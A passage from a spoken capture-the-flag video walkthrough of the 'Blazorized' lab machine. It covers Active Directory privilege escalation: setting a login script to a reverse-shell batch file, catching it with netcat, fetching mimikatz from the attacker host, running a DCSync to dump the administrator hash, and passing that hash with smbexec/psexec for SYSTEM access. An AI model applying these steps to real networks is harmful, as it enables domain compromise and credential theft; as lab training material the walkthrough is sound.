again, because I'm just curious. I think we did it from this shell. We did. 4810. We want to do, was it SSA 6010? Script path. There we go. It is set. We can see it's set there. So I'm going to wait. Let's do 2 minutes and then see if we get a callback. If we don't, then we'll try something else. And we never got a shell. If I do a dir, let's see, rev.ps1 still exists. If we try to execute it, we do get a shell back. So everything looks to be good there. I wonder if only bat files would work. Let's see, script path. That looks right. Let's try doing a bat file. So do PowerShell -encoding. And then this is where we want to go back and grab our cradle. Cat cradle. Is it in www? It is. I convert UTF-16 little endian base64W0. So do PowerShell enc like that to rev.bat. If we try to execute rev.bat, that did not work. What's this look like? cmd/c. I think that is right. I don't know exactly why that is failing. I wonder if this is an encoding issue. Let's see, type revbat. I forget exactly how to change this. Let's try GC for get content, revbat. Then we can do a set content. We'll call it rev2.bat. And then encoding ASCII. So if we do encoding UTF-8. Oh, wait. Yeah, that definitely changed the size with the encoding ASCII. I was looking like at these two and those were still high numbers, but this is half the size on rev2.bat. So I think it was the encoding. We execute it. PowerShell, there we go. That looks better. So let's set the script path to be rev2.bat. Let's see, where is that? There we go. So we changed two things here. Number one, we encoded it to ASCII. And number two, we're calling a batch script instead of PowerShell just in case login scripts don't use PowerShell, but I think PowerShell's fine with them. And we get a shell almost instantly. So that was definitely it. It was the encoding issue. Where's that set content command? Let's do rev.ps1. We'll call this rev2.ps1. And oddly enough, it's only one size different. So I think it has to be a bat file. Let's just do rlwrap nc lvmp 9001. And we're going to set this to be rev2.ps1. And I don't think this is going to magically get us a shell quickly. The issue is definitely with it being PowerShell, it needing to be a bat file. So let's look at 6010. So if we go back to Bloodhound, we can search for the user 6010. There they are. Mark them as owned, even though I don't know exactly what marking as owned does in community Bloodhound, but it's habit anyways. We see outbound control. they have a member of this support administrator, which has dcsync privileges over the domain. So we can run a dcsync from here. So let's go back and program data. And then we want to get mimikatz. So we can do locate mimikatz.exe, cp, user share mimikatz. This one should be fine. And again, we're not running secrets dump because we don't know this user's password. We may be able to just set the password and then secrets dump, but that's not really OPSEC safe to change users' passwords, right? So mimikatz, probably the better way to go about it. Let's see, we can curl HTTP 10.10.14.8, port 8000, mimikatz.exe, mimikatz.exe. See, do we get a 404? We forgot a .10. There it is. So now we can do mimikatz.exe. Was it LSA dump dcsync? Mimikatz does parameters really oddly. I wonder if we can just do this. /domain, Blazorized.HTB, user administrator. Is this going to work? Maybe it worked, but then it also like spam my output. Let's see, standard module not found. So it ran each of those as separate commands. And then hung. Which is fine, because that user, we couldn't do it from anyways. We need to be in this terminal. mimikatz.exe, LSA dump, dcsync. I wonder if we put these in quotes like this. Blazorized.HTB. There we go. That works. So here we can get the NTLM hash for the administrator user, which then we can use this to log in. So if we do like SMB exec, administrator, we can just do administrator at 10.10.11.22. Forget exactly how to specify the hash. Probably -H. Or it's hashes, I think, actually. Like that. Let's see. Yep, there we go. So if we do who am I, we are now the system user. We could do ps-exec as well if we wanted to. This will upload the binary and then execute it. This is what most people probably do. Who am I? System still, so we can go users, administrator, desktop, and get the flag. So that's pretty much going to be the video. Hope you guys enjoyed it. Take care, and I'll see you all next time.